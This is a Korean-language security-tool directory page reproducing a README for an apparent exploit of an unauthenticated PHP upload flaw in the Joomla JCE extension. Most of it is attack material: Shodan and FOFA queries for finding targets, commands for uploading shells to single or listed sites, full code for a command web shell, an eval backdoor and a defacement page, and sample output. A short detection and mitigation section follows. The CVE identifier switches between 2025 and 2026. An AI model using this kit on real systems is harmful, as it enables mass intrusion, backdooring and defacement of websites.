Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-48907 — CVE-2025-48907 - Joomla JCE < 2.9.99.5에 대한 인증되지 않은 RCE 익스플로잇 | Kitploit
도구/GitHubGitHub/0xgh057r3c0n/cve-2026-48907
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHub0xgh057r3c0n/cve-2026-48907

CVE-2026-48907

CVE-2025-48907 - Joomla JCE < 2.9.99.5에 대한 인증되지 않은 RCE 익스플로잇

저장소 보기
411개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Joomla Logo

CVE-2026-48907 - Joomla! JCE 인증되지 않은 원격 코드 실행 (RCE)

Joomla! JCE 확장 프로그램 2.9.99.5 미만 - 인증되지 않은 임의 PHP 파일 업로드 및 원격 코드 실행

License: MIT Python 3.6+ Security Shodan FOFA


🔎 검색 엔진 쿼리

Shodan

root@kitploit:~
http.component:"Joomla"

FOFA

root@kitploit:~
app="Joomla"

📋 개요

이 저장소는 CVE-2026-48907에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이는 Joomla! JCE (Joomla Content Editor) 확장 프로그램 버전 2.9.99.5 미만에서 발생하는 심각한 취약점입니다. 이 취약점은 인증되지 않은 공격자가 JCE 프로필 가져오기 기능을 통해 임의의 PHP 파일을 업로드할 수 있게 하여 원격 코드 실행(RCE) 으로 이어집니다.

⚠️ 면책 조항

이 도구는 교육 및 승인된 테스트 목적으로만 사용됩니다.

  • 소유하고 있거나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.
  • 저자는 오용 또는 불법 활동에 대해 책임을 지지 않습니다.
  • 테스트 전에 항상 적절한 승인을 받으십시오.

🔍 취약점 세부 정보

작동 방식

  1. CSRF 토큰 추출: 익스플로잇이 먼저 대상 홈페이지에서 CSRF 토큰을 추출합니다.
  2. 프로필 가져오기 남용: JCE 프로필 가져오기 기능(index.php?option=com_jce&task=profiles.import)을 악용합니다.
  3. PHP 파일 업로드: 프로필 XML 파일로 위장한 악성 PHP 파일을 업로드합니다.
  4. 코드 실행: 업로드된 PHP 파일은 /tmp/ 디렉터리에 배치되며 직접 접근을 통해 실행될 수 있습니다.

🚀 기능

  • ✅ 모든 PHP 파일 업로드: 사용자 정의 PHP 셸, 백도어, 또는 디페이스 페이지(PHP 기반)를 업로드할 수 있습니다.
  • ✅ 일괄 처리: 파일에서 여러 대상을 스캔하고 익스플로잇할 수 있습니다.
  • ✅ CSRF 토큰 자동 감지: CSRF 토큰을 자동으로 추출합니다.
  • ✅ 상세 모드: 디버깅을 위한 상세 출력을 제공합니다.
  • ✅ 결과 내보내기: 성공한 업로드 URL을 파일에 저장합니다.

📦 설치

root@kitploit:~
# 저장소 클론
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907

# 필요한 종속성 설치
pip3 install requests urllib3

요구 사항

  • Python 3.6 이상
  • requests 라이브러리
  • urllib3 라이브러리

🎯 사용법

기본 구문

root@kitploit:~
python3 CVE-2025-48907.py -u <타겟_URL> -F <업로드할_PHP_파일>

예시

PHP 웹 셸 업로드

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php

PHP 디페이스 페이지 업로드

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php

PHP 백도어 업로드

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php

타겟 파일을 사용한 일괄 익스플로잇

root@kitploit:~
python3 CVE-2025-48907.py -f targets.txt -F payload.php

상세 출력 및 결과 저장

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt

명령줄 인수

* -u 또는 -f 중 하나를 반드시 제공해야 합니다

타겟 파일 형식

targets.txt 파일을 한 줄에 하나의 URL로 생성합니다:

root@kitploit:~
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# 주석은 무시됩니다
https://example-joomla.com

🔧 PHP 페이로드 생성

모든 페이로드는 PHP 파일이어야 합니다. 익스플로잇이 서버에서 실행될 PHP 코드를 업로드하기 때문입니다.

PHP 웹 셸

shell.php 생성:

root@kitploit:~
<?php
// 간단한 PHP 웹 셸
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "사용법: ?cmd=명령어";
}
?>

PHP 디페이스 페이지

deface.php 생성:

root@kitploit:~
<?php
// PHP 디페이스 페이지
echo '<!DOCTYPE html>
<html>
<head>
    <title>0xgh057r3c0n에 의해 해킹됨</title>
    <style>
        body {
            background: #000;
            color: #0f0;
            font-family: "Courier New", monospace;
            text-align: center;
            padding: 50px;
        }
        h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
        .ascii-art { white-space: pre; font-size: 12px; }
    </style>
</head>
<body>
    <h1>0xgh057r3c0n에 의해 해킹됨</h1>
    <div class="ascii-art">
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
    ███████║███████║██║     █████╔╝ █████╗  ██║  ██║
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██║  ██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██████╔╝
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
    </div>
    <p>보안은 제품이 아니라 과정입니다.</p>
    <p>서버: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
    <p>시간: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>

PHP 백도어 (최소)

backdoor.php 생성:

root@kitploit:~
<?php
// 최소 PHP 백도어
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>

📊 출력 예시

root@kitploit:~
_____________   _______________         _______________   ________  ________            _____   ______  ________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/  _____/           /  |  | /  __  \/   __   \   _  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/   __  \   ______  /   |  |_>      <\____    /  /_\  \  /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  |__\  \ /_____/ /    ^   /   --   \  /    /\  \_/   \/    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \_____  /         \____   |\______  / /____/  \_____  /____/  
        \/                  \/                  \/     \/         \/     \/               |__|       \/                \/

Joomla! JCE 확장 프로그램 2.9.99.5 미만 인증되지 않은 RCE
작성자 : 0xgh057r3c0n (PHP 파일 업로드)

[*] 타겟 3개 로드됨

[*] 타겟 1/3
[*] ==================================================
[+] 타겟: http://target-joomla.com
[+] CSRF 토큰 가져오는 중...
[+] CSRF 토큰: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] PHP 파일 업로드 중: cve-2026-48907-1234.xml.php
[+] 프로필이 성공적으로 가져와졌습니다!
[+] 업로드된 PHP 파일 테스트 중...

============================================================
[!!!!!] PHP 파일이 성공적으로 업로드되었습니다!
[!!!!!] 서버가 CVE-2025-48907에 취약합니다!
============================================================

[+] 업로드된 PHP 파일 보기: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] 빠른 접근:
    curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"

🛡️ 탐지 및 완화

탐지 방법

  • /tmp/ 디렉터리에서 의심스러운 PHP 파일 확인
  • 로그에서 JCE 프로필 가져오기 활동 모니터링
  • 예상치 못한 index.php?option=com_jce&task=profiles.import 요청 확인
  • /tmp/ 디렉터리에서 .xml.php 확장자를 가진 파일 확인
  • /tmp/ 디렉터리에서 비정상적인 PHP 실행 모니터링

완화 조치

  1. JCE 확장 프로그램 업데이트:

    • 버전 2.9.99.5 이상으로 업그레이드
    • 다운로드: JCE 공식 웹사이트
  2. 임시 해결 방법:

    • 필요하지 않으면 JCE 확장 프로그램 비활성화
    • 웹 애플리케이션 방화벽(WAF) 규칙 구현
    • /tmp/ 디렉터리에서 PHP 실행 제한
    • 필요하지 않으면 allow_url_fopen 비활성화
  3. 침해 후 조치:

    • /tmp/에서 업로드된 PHP 파일 제거
    • 백도어를 위한 시스템 감사
    • 모든 자격 증명 재설정 (Joomla 관리자, FTP, 호스팅)
    • 시스템 로그 검토하여 무단 접근 확인
    • 다른 손상된 파일 확인

📝 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하십시오.

License: MIT


🤝 기여

기여는 환영합니다! Pull Request를 자유롭게 제출해 주십시오.

  1. 저장소 포크
  2. 기능 브랜치 생성 (git checkout -b feature/AmazingFeature)
  3. 변경 사항 커밋 (git commit -m 'Add some AmazingFeature')
  4. 브랜치에 푸시 (git push origin feature/AmazingFeature)
  5. Pull Request 열기

⭐ 스타 기록

이 도구가 유용하다면, GitHub에서 ⭐를 눌러 주시기 바랍니다!


📞 연락 및 지원

  • 작성자: 0xgh057r3c0n
  • GitHub: https://github.com/0xgh057r3c0n/CVE-2025-48907
  • 이슈: 버그 신고

🔗 참조

  • NVD - CVE-2025-48907
  • JCE 공식 웹사이트
  • Joomla! 보안 센터

❤️를 담아 0xgh057r3c0n이 제작
도구 다운로드
속성값
CVE IDCVE-2026-48907
제품Joomla! JCE 확장 프로그램
영향을 받는 버전2.9.99.5 미만
취약점 유형인증되지 않은 PHP 파일 업로드 → RCE
CVSS 점수9.8 (심각)
공격 벡터네트워크
인증필요 없음
영향완전한 시스템 손상
인수필수설명
-u, --url예*단일 타겟 URL (예: http://target.com)
-f, --file예*타겟 URL 목록이 포함된 파일 (한 줄에 하나의 URL)
-F, --upload-file예업로드할 PHP 파일 (셸, 백도어, 디페이스 페이지)
-v, --verbose아니요디버깅을 위한 상세 출력 활성화
-o, --output아니요성공한 업로드 URL을 파일에 저장